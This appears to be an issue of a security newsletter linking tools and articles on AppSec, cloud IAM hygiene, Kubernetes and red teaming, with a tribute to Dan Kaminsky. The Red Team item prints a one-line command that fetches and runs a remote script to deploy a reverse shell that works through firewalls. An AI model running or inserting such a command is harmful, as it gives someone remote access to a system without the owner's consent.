Hey there,
I hope you've been doing well!
Types of Errors
Sometimes it can be hard to grok the terms people use to describe security tool output.
Thankfully, Vladimir Haltakov shared this helpful graphic.
My immediate next thought was, "OK great, but what about soundness and completeness?" I see @maegfair in fact asked this exact question, and while I like the responses, I think there's more that can be done.
Random idea: how excited would you be about memes explaining static analysis (or program analysis / automated bug finding in general), or via a comic or something?
Sponsor
Scale your security team with Faraday
Attack surface increases day-by-day, reaching the limits of every team's resources without proactive collaboration, automation and cross-company integrations.
What if you could automate daily tasks, like running your favorite scanners and actions based on findings? Normalize and review results from different sources, manage, tag, track vulnerabilities as a team and generate outstanding reports with ease.
Faraday is a Vulnerability Management platform that enables teams to scale. Let us show you how to rethink vulnerability management.
Try Faraday now
In this newsletter...
- AppSec: Security program metrics, GitHub Action to find license compliance issues, static analysis for shell scripts, visualize your dependencies and their vulns in a graph DB, requirements for modern security tools
- Web Security: sqlmap for command injection, attacking remote debuggers
- Cloud Security: Using last accessed info to tighten IAM permissions, annotating Kubernetes services, do OS's even matter now?
- Container Security: Kubernetes stress testing tool, a practical guide to writing secure Dockerfiles
- Red Team: A small reverse shell that works through NAT/firewalls
- The Creator Economy: Digital value exchange in the future, universal creative income
- Misc: Ransomware monetizing via shorting stock
- Remembering Dan Kaminsky: Reflections, stories, and the power of kindness
AppSec
What basic security metrics should a good cybersecurity program keep track of?
Twitter thread by @EdgarR0jas.
fossas/fossa-action
GitHub Action by FOSSA that uses the FOSSA CLI
to find license compliance and security issues. Note: requires a FOSSA license
key.
koalaman/shellcheck
A static analysis tool for shell scripts by Vidar
Holen. Largely focuses on quality/correctness
issues rather than security: incorrect quoting or conditionals, frequently misused
commands, common beginner mistakes, portability, and more.
How to create a Software Bill of Materials in Neo4J
By Javier Dominguez: how to visualize a
project's libraries and the vulnerabilities in its dependencies. Run OWASP
Dependency-Check on a project -> import the result into Neo4J -> run graph
queries.

Changing Security Tool Requirements in the New DevSecOps World
Twilio's Yash Kosaraju provides a nice overview
of how modern security tools should ideally work: results consumable directly by
developers, fast (doesn't prohibitively slow down CI/CD), API-first and
integration rich, high signal (better to have false negatives than cause
engineer fatigue and lack of trust in the tool), and deliver results in
developers' workflows and the systems they already use.
And I love this comment by Laksh Raghavan about it:
Aspire to go from "identification of a specific vulnerability" to "implemented as a check in tool(s) + scans of ALL apps completed" in a matter of hours, not days. Shorten the time of all feedback loops. Reduce exposure time.
See also Laksh's excellent talk on the dev-friendly continuous scanning platform they built at PayPal.
Web Security
commixproject/commix
By Anastasios Stasinopoulos: automates the detection and exploitation of
command injection vulnerabilities; like sqlmap, but for command injection.
Remote debuggers as an attack vector
Exposed debuggers are a great way to get remote code execution. Acunetix'
Aleksei Tiurin lists a number of debuggers for
different languages, their default ports, and tips on exploiting them.
Cloud Security
Review last accessed information to identify unused EC2, IAM, and Lambda permissions and tighten access for your IAM roles
"When you are working on new permissions for your team, you can use IAM Access
Analyzer policy generation to create a policy based on your access activity and
set fine-grained permissions. To analyze and refine existing permissions, you
can use last accessed information to identify unused actions in your IAM
policies and reduce access."
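One way to act on that last accessed data, as an added example of my own rather than code from the AWS post: pull the action-level report for a role with boto3 (role ARN and idle threshold are assumptions) and list the services and actions that have not been exercised within the threshold, which are the candidates for removal from the policy. The parser is shown on a constructed response so it runs without AWS credentials.

```python
from datetime import datetime, timedelta, timezone
import time

def unused_permissions(services, now, max_idle_days=90):
    """Return (unused_services, unused_actions) from a ServicesLastAccessed list.

    A service with no LastAuthenticated was never used in the tracking window;
    an action with no LastAccessedTime, or one older than max_idle_days, is stale.
    """
    cutoff = now - timedelta(days=max_idle_days)
    unused_services, unused_actions = [], []
    for svc in services:
        ns = svc["ServiceNamespace"]
        last = svc.get("LastAuthenticated")
        if last is None or last < cutoff:
            unused_services.append(ns)
            continue
        for act in svc.get("TrackedActionsLastAccessed", []):
            when = act.get("LastAccessedTime")
            if when is None or when < cutoff:
                unused_actions.append(f"{ns}:{act['ActionName']}")
    return unused_services, unused_actions

def fetch_last_accessed(role_arn, poll_seconds=2):
    """Run the IAM last-accessed job (needs AWS credentials) and return ServicesLastAccessed."""
    import boto3  # imported here so unused_permissions() runs without boto3 installed
    iam = boto3.client("iam")
    job = iam.generate_service_last_accessed_details(Arn=role_arn, Granularity="ACTION_LEVEL")
    while True:
        resp = iam.get_service_last_accessed_details(JobId=job["JobId"])
        if resp["JobStatus"] != "IN_PROGRESS":
            break
        time.sleep(poll_seconds)
    if resp["JobStatus"] != "COMPLETED":
        raise RuntimeError(f"last-accessed job failed: {resp.get('Error')}")
    return resp["ServicesLastAccessed"]

# Constructed sample shaped like the API response (not data from a real account).
NOW = datetime(2021, 5, 1, tzinfo=timezone.utc)
SAMPLE = [
    {"ServiceName": "Amazon S3", "ServiceNamespace": "s3",
     "LastAuthenticated": NOW - timedelta(days=3),
     "TrackedActionsLastAccessed": [
         {"ActionName": "GetObject", "LastAccessedTime": NOW - timedelta(days=3)},
         {"ActionName": "DeleteBucket"}]},  # granted to the role but never exercised
    {"ServiceName": "AWS Lambda", "ServiceNamespace": "lambda",
     "LastAuthenticated": NOW - timedelta(days=200)},
    {"ServiceName": "Amazon EC2", "ServiceNamespace": "ec2"},  # never authenticated at all
]
```

For a live role, `unused_permissions(fetch_last_accessed("arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"), datetime.now(timezone.utc))` gives the same two lists; action-level tracking is only available for the services IAM supports it for, so a service with no tracked actions is judged at the service level only.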
Annotating Kubernetes Services for Humans
There's a variety of meta info that's generally useful to know about a code repo,
like: who owns it? What Slack channel does the team use? Where should I file a
bug? I've seen a number of companies require every repo
to have a YAML file with certain metadata, and it's invariably quite useful to
both the security and engineering teams.
In this post, Richard Li recommends doing a similar
thing, but for microservices, using Kubernetes annotations.
Nobody Cares About the Operating System Anymore
Last Week in AWSā Corey Quinn argues that
originally oneās OS mattered due to support contracts, but cloud offerings have
largely abstracted this away, with containers and functions as a service going
even further. "The Distro Wars are now about #Kubernetes implementations." As always, I love the snark:
Once upon a time when I was a fledgling Linux systems administrator, the distribution you used Really Mattered.
You used Gentoo or similar if you didn't value your time, you used Ubuntu if you valued community, you went with Debian if you enjoyed having the crap kicked out of you in IRC channels and mailing lists, and so on.
Container Security
Introducing kube-burner, A tool to Burn Down Kubernetes and OpenShift
Raul Sevilla Canavate describes
kube-burner, a tool aimed at
stressing Kubernetes clusters by creating or deleting a high quantity of
objects.
A practical guide to writing secure Dockerfiles
The blog version of Madhu Akula's talk that I
called out in tl;dr sec 70, which includes a number of useful tips and other good resources and tools. Great overview.
Red Team
Global Socket | Connect like there is no firewall
By @hackerschoice: Deploy a reverse login
shell with a single command, and access the shell remotely,
encrypted, through NAT/firewalls and via TOR if you like.
$ bash -c "$(curl -fsSL http://gsocket.io/x)"
The Creator Economy
Thinking About Different Types of Digital Value Exchange
Daniel Miessler posits the following are
inevitable: peer-to-peer value exchange, creator economies, and granular
investment. I've previously thought it'd be neat to be able to "invest" in
someone's career who you think is a rising star, who perhaps might come from a
disadvantaged background. Some bootcamps do this in a way, by taking a cut of
graduates' first year salary.
The Case for Universal Creative Income
By Li Jin and Lila
Shroff: "In 1935, the US enacted various New
Deal cultural programs to provide relief for jobless artists and democratize
public access to art. A century later, it's time to renew that spirit." They
argue for the value of UCI to the economy (more innovation and creativity), to
platforms (entice more creators and thus value to users), and to creators (less stress,
enable creators from underprivileged groups to take the leap).
Misc
Ransomware gang wants to short the stock price of their victims
Cyber crime monetization is pretty interesting. Here's another angle: short the
victim's stock before announcement, taking advantage of the dip. Unfortunately
for them, this is probably not that effective, as dips are usually small and
temporary, and any person taking a large short bet would likely be investigated
by the SEC or other regulatory bodies.
Remembering Dan Kaminsky
This week, Marc Rogers announced that Dan Kaminsky had passed away.
I didn't know Dan, but I was fortunate enough to see his DNS talk live at DEF CON. I remember feeling my brain hurting about 10 minutes into the talk as I tried to keep up.
It's been heartwarming to see glimpses of Dan, whether it's via The Register, The Seattle Times, or The New York Times giving a bit of context about his life, or the personal stories from Ryan Naraine, this HN thread, or this "tell me your best Dan Kaminski stories" Twitter thread by Riana Pfefferkorn.
I also enjoyed this Twitter thread of Dan's:
Reading all of these stories about Dan, I find it moving and a bit... inspiring.
Like ripples from a pebble dropped in a pond, I think about all of the people's lives Dan touched, in big and small ways.
Even if you haven't (yet) found epic bugs that break the Internet; every day, your actions and words affect people.
We can all be the source of making the Internet a little bit safer, and the lives around us a little bit happier, one supportive smile or kind word at a time.
You can make a lot of ripples in a lifetime.
The closing number of Hamilton comes to mind: Who Lives, Who Dies, Who Tells Your Story:
I try to make sense of your thousands of pages of writings
You really do write like you're running out of time
I ask myself, what would you do if you had more time?
Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them.
Thanks for reading!
Cheers,
Clint
@clintgibler